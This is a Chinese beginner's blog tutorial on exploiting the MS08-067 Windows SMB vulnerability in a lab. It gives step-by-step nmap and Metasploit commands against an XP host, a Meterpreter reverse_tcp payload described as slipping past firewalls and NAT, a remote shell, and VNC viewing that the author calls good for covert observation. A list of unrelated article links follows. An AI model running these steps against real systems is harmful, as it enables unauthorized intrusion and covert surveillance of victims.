(菜鸟自学)Metasploit漏洞利用——ms08-067

(菜鸟自学)漏洞利用——ms08-067

  • 漏洞简介
  • 利用nmap+MSF软件对XP sp3系统进行渗透攻击
    • 设置exploit模块参数
      • RHOST
      • RPORT
      • SMBPIPE
      • Exploit Target
    • 设置有效载荷
      • 查找可兼容的有效载荷
    • 渗透测试
      • VNC

漏洞简介

MS08-067 是指微软于2008年发布的一个安全漏洞(CVE-2008-4250)。该漏洞影响了 Windows 操作系统中的 Server Service,可被远程攻击者利用来执行任意代码,从而完全控制受影响的系统。

这个漏洞主要影响 Windows 2000、Windows XP 和 Windows Server 2003 等早期版本的操作系统。攻击者可以通过发送特制的网络请求,利用该漏洞来执行恶意代码,从而取得对受感染计算机的完全控制权。

MS08-067 漏洞的危害性非常严重,因为它允许攻击者在没有任何用户交互的情况下远程执行任意代码。此漏洞的滥用导致了大量的蠕虫和僵尸网络的传播。为了解决这个漏洞,微软发布了相应的安全补丁,建议用户及时更新受影响的系统。

利用nmap+MSF软件对XP sp3系统进行渗透攻击

首先执行命令msfconsole启动Msf。
在这里插入图片描述
执行以下命令对目标进行信息收集的扫描

 nmap -sT -A --script=smb-vuln-ms08-067 -P0 192.168.10.110 
//从msf中调用nmap插件进行扫描
参数说明:
-sT TCP完整连接扫描,与telnet端口类型
-A 启用操作系统检测,版本检查,脚本扫描和追踪路由
--script=smb-vuln-ms08-067 检查远程执行漏洞攻击(MS08-067)
-P0 IP协议的ping探测

在这里插入图片描述
从扫描的结果判断目标系统为Windows XP。
再通过search ms08-067检索相应exploit模块。
在这里插入图片描述
通过检索我们能够看见相应模块的命令,此时可以通过info <模块名称>来进行验证。
在这里插入图片描述

设置exploit模块参数

通过检索的模块目录,使用use <模块路径or模块序号>命令来使用该模块,将进入exploit的系统提示符,在此提示符下,将省略名称中的exploit/部分。
在这里插入图片描述
上述信息表明我们已进入指定的模块设置环境了。
可以先使用show options命令查看模块默认的配置参数。
在这里插入图片描述

RHOST

RHOST(Remote Host)代表远程主机,它允许用户在执行渗透测试时指定要攻击的目标。在使用 Metasploit Framework 进行渗透测试时,用户通常需要指定一个目标主机来执行攻击操作。RHOST 参数用于指定目标主机的地址,可以是目标主机的 IP 地址或域名。
通过指定 RHOST 参数,Metasploit Framework 将针对指定的目标主机执行相应的漏洞利用模块或攻击载荷。用户可以根据目标主机的特征和所需的攻击类型来设置 RHOST 参数,以便对目标主机进行针对性的渗透测试。
此例中目标主机为Windows XP,可在XP上通过ipconfig查看网络信息。
在这里插入图片描述
使用命令set RHOST 192.168.10.110命令设置该参数。
在这里插入图片描述

RPORT

RPORT(Remote Port)代表远程端口,它允许用户在执行渗透测试时指定要攻击的目标端口。在使用 Metasploit Framework 进行渗透测试时,用户通常需要指定一个目标端口来执行攻击操作。RPORT 参数用于指定目标主机上正在监听的端口,以便 Metasploit Framework 可以针对该端口执行相应的漏洞利用模块或攻击载荷。

通过指定 RPORT 参数,Metasploit Framework 可以根据目标主机上打开的端口执行相应的攻击操作,从而提高攻击成功率。用户可以根据目标主机上开放的端口和所需的攻击类型来设置 RPORT 参数,以便对目标主机进行针对性的渗透测试。
设置该参数的格式为set <待设置选项的的名称> <选项值>。而本例中的端口恰好正是此模块默认的“445”端口,故此我们可以省略设置远程端口这一步。

SMBPIPE

SMBPIPE 是一种 SMB(Server Message Block)协议的命名管道(Named Pipe),用于在 SMB 网络中进行通信。SMB 协议是一种用于文件共享、打印机共享和其他网络资源访问的通信协议,它广泛用于 Windows 网络中。
SMBPIPE 可以用于在 SMB 网络中执行远程代码或获取系统权限,因此它经常被黑客用于发起攻击。攻击者可以通过 SMBPIPE 利用 SMB 协议中的漏洞来获取系统权限,例如 MS08-067 漏洞,在许多 Windows 系统中都存在该漏洞。
使用 Metasploit Framework 进行渗透测试时,可以利用 SMBPIPE 进行攻击,从而实现特定目标的渗透。Metasploit Framework 中包含了许多针对 SMB 协议的漏洞利用模块,可以针对不同的漏洞利用 SMBPIPE 进行攻击。

本例中此参数设置采用默认不做更改即可。

Exploit Target

Exploit Target 是 Metasploit Framework 中的一个参数,用于指定目标主机上正在运行的应用程序或服务。Exploit Target 允许用户在执行渗透测试时对特定目标进行针对性攻击,从而提高攻击成功率。
在使用 Metasploit Framework 进行渗透测试时,用户通常需要针对特定的应用程序或服务进行攻击。Exploit Target 参数用于指定要攻击的应用程序或服务,以便 Metasploit Framework 可以选择合适的漏洞利用模块或攻击载荷来执行攻击操作。
通过设置 Exploit Target 参数,Metasploit Framework 可以根据目标主机上正在运行的应用程序或服务来选择相应的攻击载荷,从而提高攻击成功率。用户可以根据目标主机上安装的软件和所需的攻击类型来设置 Exploit Target 参数,以便对目标主机进行针对性的渗透测试。

如果要了解这些选项的取值范围可通过show targets命令查询。
在这里插入图片描述
通过返回的信息表明,此模块能够攻击的系统版本高达72种。但为了能够方便简捷,我们直接使用默认选用的Automatic Targeting选项自动识别即可。
若是需要设置的话格式为set target <目标编号>

设置有效载荷

有效载荷,也称为 Payload,是指在渗透测试或攻击中,用于执行恶意代码的程序或脚本。有效载荷可以是一段命令、一段脚本或者一个可执行文件,它被设计用于利用目标系统的漏洞、弱点或者安全配置不当,从而实现攻击者的目的。

在使用 Metasploit Framework 进行渗透测试时,有效载荷通常用来执行远程代码或者获取对目标系统的控制权。Metasploit Framework 中包含了许多针对不同操作系统和应用程序的有效载荷,用户可以根据具体的攻击需求选择合适的有效载荷。

有效载荷的设计和使用需要技术水平较高的安全专家来完成。攻击者需要了解目标系统的漏洞和弱点,并且有能力编写或选择合适的有效载荷来实现攻击目标。

查找可兼容的有效载荷

可通过show payloads命令检索适用的有效载荷。
在这里插入图片描述
即使我们忘记设置有效载荷的某些选项,Msf也会给exploit模块分配默认的有效载荷以及相关的默认配置,以确保有效载荷能够成功运行。

本例我们使用命令选用set payload windows/meterpreter/reverse_tcp这个常用的payload。该载荷攻击成功后,会做一个反弹,连接到LHOST中定义的IP地址,这种反弹连接可以绕过防火墙和入站流量包含,或者渗透NAT网关。

渗透测试

直接运行exploitrun运行该攻击模块。
在这里插入图片描述
可见该命令创建了一个meterpreter会话,Meterpreter 是一个强大的后渗透工具,它是 Metasploit 框架中的一个模块,可用于在受攻击的系统上执行各种任务,例如提权、远程控制、文件上传/下载、截屏等。如若需要结束会话,使用exit命令结束会话,返回Msf控制台。
在这里插入图片描述
meterpreter 会话中输入 shell 命令可以打开一个交互式的命令行 shell,相当于在目标系统上执行命令。此时,会话将从 meterpreter 提示符切换到目标系统的 shell 提示符下,你可以在该 shell 中执行各种基于目标系统的命令,并查看操作系统的文件、进程、网络等信息。
在这里插入图片描述
能够登陆到远程XP系统上的命令行模式中,就代表我们漏洞利用成功,已顺利渗透进了目标系统。

VNC

meterpreter会话中执行run vnc命令开启vnc,可以远程的查看到xp的桌面,但是无法控制,非常适合暗中观察。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/336589.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

重学Java 10 面向对象

正是风雨欲来的时候&#xff0c;火却越烧越旺了 ——24.1.20 重点 1.为何使用面向对象思想编程 2.如何使用面向对象思想编程 3.何时使用面向对象思想编程 4.利用代码去描述世间万物的分类 5.在一个类中访问另外一个类中的成员 -> new对象 6.成员变量和局部变量的区别 一…

利用HTML+CSS+JS打造炫酷时钟网页的完整指南

引言 在现代Web开发中&#xff0c;制作一个引人注目的时钟网页是一种常见而令人愉悦的体验。本文将介绍如何使用HTML、CSS和JavaScript来创建一个炫酷的时钟网页&#xff0c;通过这个项目&#xff0c;你将学到如何结合这三种前端技术&#xff0c;制作一个动态且美观的时钟效果…

接口测试 02 -- JMeter入门到实战

前言 JM eter毕竟是做压测的工具&#xff0c;自动化这块还是有缺陷。 如果公司做一些简单的接口自动化&#xff0c;可以考虑使用JMeter快速完成&#xff0c;如果想做完善的接口自动化体系&#xff0c;建议还是基于Python来做。 为什么学习接口测试要先从JMeter开始&#xff1f;…

C语言数据结构——顺序表

&#xff08;图片由AI生成&#xff09; 0.前言 在程序设计的世界里&#xff0c;数据结构是非常重要的基础概念。本文将专注于C语言中的一种基本数据结构——顺序表。我们将从数据结构的基本概念讲起&#xff0c;逐步深入到顺序表的内部结构、分类&#xff0c;最后通过一个实…

Unity常用的优化技巧集锦

Unity性能优化是面试的时候经常被问道的一些内容&#xff0c;今天给大家分享一些常用的Unity的优化技巧和思路&#xff0c;方便大家遇到问题时候参考与学习。 对啦&#xff01;这里有个游戏开发交流小组里面聚集了一帮热爱学习游戏的零基础小白&#xff0c;也有一些正在从事游…

电脑pdf如何转换成word格式?用它实现pdf文件一键转换

pdf转word格式可以用于提取和重用pdf文档中的内容&#xff0c;有时候&#xff0c;我们可能需要引用或引用pdf文档中的一些段落、表格或数据&#xff0c;通过将pdf转换为可编辑的Word文档&#xff0c;可以轻松地复制和粘贴所需内容&#xff0c;节省我们的时间&#xff0c;那么如…

【守护工地安全】YOLOv8实现安全帽检测

学习《OpenCV应用开发&#xff1a;入门、进阶与工程化实践》一书 做真正的OpenCV开发者&#xff0c;从入门到入职&#xff0c;一步到位&#xff01; 数据集 该图像数据集包含8000张图像&#xff0c;两个类别分别是安全帽与人、以其中200多张图像为验证集&#xff0c;其余为训…

谁说知识库都是英文的 今天就来一个中文版的

1.安装 1.1创建目录 mkdir -p /opt/trilium-cn cd /opt/trilium-cn 1.2.编写docker-compose.yml文件 version: 3 services:trilium-cn:image: nriver/trilium-cnrestart: alwaysports:- "10012:8080"volumes:# 把同文件夹下的 trilium-data 目录映射到容器内- /opt…

基于JavaWeb+SSM+Vue基于微信小程序生鲜云订单零售系统的设计和实现

基于JavaWebSSMVue基于微信小程序生鲜云订单零售系统的设计和实现 滑到文末获取源码Lun文目录前言主要技术系统设计功能截图订阅经典源码专栏Java项目精品实战案例《500套》 源码获取 滑到文末获取源码 Lun文目录 目录 1系统概述 1 1.1 研究背景 1 1.2研究目的 1 1.3系统设计…

6.4.4释放音频

6.4.4释放音频 许多Flash动画里的音乐或歌曲非常好听&#xff0c;能不能在没有源文件的情况下把里面的声音文件取出来呢&#xff1f;利用Swf2VideoConverter2可以轻松做到这一点。 1&#xff0e;单击“添加”按钮&#xff0c;在弹出的下拉菜单中选择“添加文件”&#xff0c;…

java小项目:简单的收入明细记事本,超级简单(不涉及数据库,通过字符串来记录)

一、效果 二、代码 2.1 Acount类 package com.demo1;public class Acount {public static void main(String[] args) {String details "收支\t账户金额\t收支金额\t说 明\n"; //通过字符串来记录收入明细int balance 10000;boolean loopFlag true;//控制循…

iOS中的视频播放

引言 在数字时代&#xff0c;视频已成为我们日常沟通和娱乐不可或缺的一部分。从简短的社交媒体剪辑到全长电影&#xff0c;我们对流畅、高质量视频播放的需求从未如此强烈。对于开发者来说&#xff0c;为iOS用户提供无瑕疵的视频体验是一项挑战&#xff0c;也是一种艺术。本篇…

数据结构之list类

前言 list是列表类。从list 类开始&#xff0c;我们就要接触独属于 Python 的数据类型了。Python 简单、易用&#xff0c;很大一部分原因就是它对基础数据类型的设计各具特色又相辅相成。 话不多说&#xff0c;让我们开始学习第一个 Python 数据类型一list。 1. list的赋值 输…

手把手教你使用 VS Code 运行和调试 Python 程序

本文以 Ubuntu 系统为例&#xff0c;介绍如何在 VS Code 上配置 Python 的编程环境&#xff0c;并把 Python 程序运行、调试起来。由于 Python 是解释型语言&#xff0c;并且 VS Code 中提供了内置的调试器可用于调试 Python 代码&#xff0c;因此配置和操作流程比调试 C/C 代码…

SpringSecurity+JWT前后端分离架构登录认证

目录 1. 数据库设计 2. 代码设计 登录认证过滤器 认证成功处理器AuthenticationSuccessHandler 认证失败处理器AuthenticationFailureHandler AuthenticationEntryPoint配置 AccessDeniedHandler配置 UserDetailsService配置 Token校验过滤器 登录认证过滤器接口配置…

C++将信息输入到文件内

第一步检查文件是否打开&#xff0c;用到头文件&#xff1a; #include <fstream> #include <sstream> 文件打开的函数为 file.isopen() 信息输入到文件应该为 file << "" << value; 注意是file<< 如图 定义file ofstream f…

计算机组成原理 第一弹

ps&#xff1a;本文章的图片来源都是来自于湖科大教书匠高老师的视频&#xff0c;声明&#xff1a;仅供自己复习&#xff0c;里面加上了自己的理解 这里附上视频链接地址&#xff1a;1-2 计算机的发展_哔哩哔哩_bilibili ​​ 目录 &#x1f680;计算机系统 &#x1f680;计…

UI测试脚本录制器已上线,RunnerGo :UI自动化测试平台

想快速配置可视化UI自动化测试脚本&#xff1f;RunnerGo近期上线脚本录制器&#xff0c;根据你的测试操作直接生成UI自动化测试脚本&#xff0c;下面是使用方法 Step1:下载录制器 点击RunnerGo上方插件按钮下载录制器 Step2:录制器使用 将插件文件拖入浏览器扩展程序 点击打…

Zabbix 系统监控详解

1 介绍 1.1 摘要 本文深入浅出&#xff0c;切近实际运维应用&#xff0c;由 zabbix 3.4 版本入手&#xff0c;学习 zabbix 监控告警实现方式&#xff0c;由 zabbix 5.0 浅出实现快速部署、快速应用。本人从业多年&#xff0c;关注 zabbix 开源社区&#xff0c;以及 zabbix 官…

【计算机网络】3、IPv6、网络三层模型、网络的规划与设计、网络的规划与设计、网络存储技术、网络地址翻译NAT、默认网关、虚拟局域网VLAN、虚拟专用网VPN、URL

文章目录 IPv6IPv6的特点IPv4和IPv6的过渡期间主要采用三种基本技术双协议栈隧道技术翻译技术 网络三层模型核心层汇聚层接入层 网络的规划与设计工作区子系统水平布线子系统管理子系统垂直干线子系统设备间子系统建筑群子系统总结 廉价磁盘网络存储技术直接附加存储(DAS)网络附…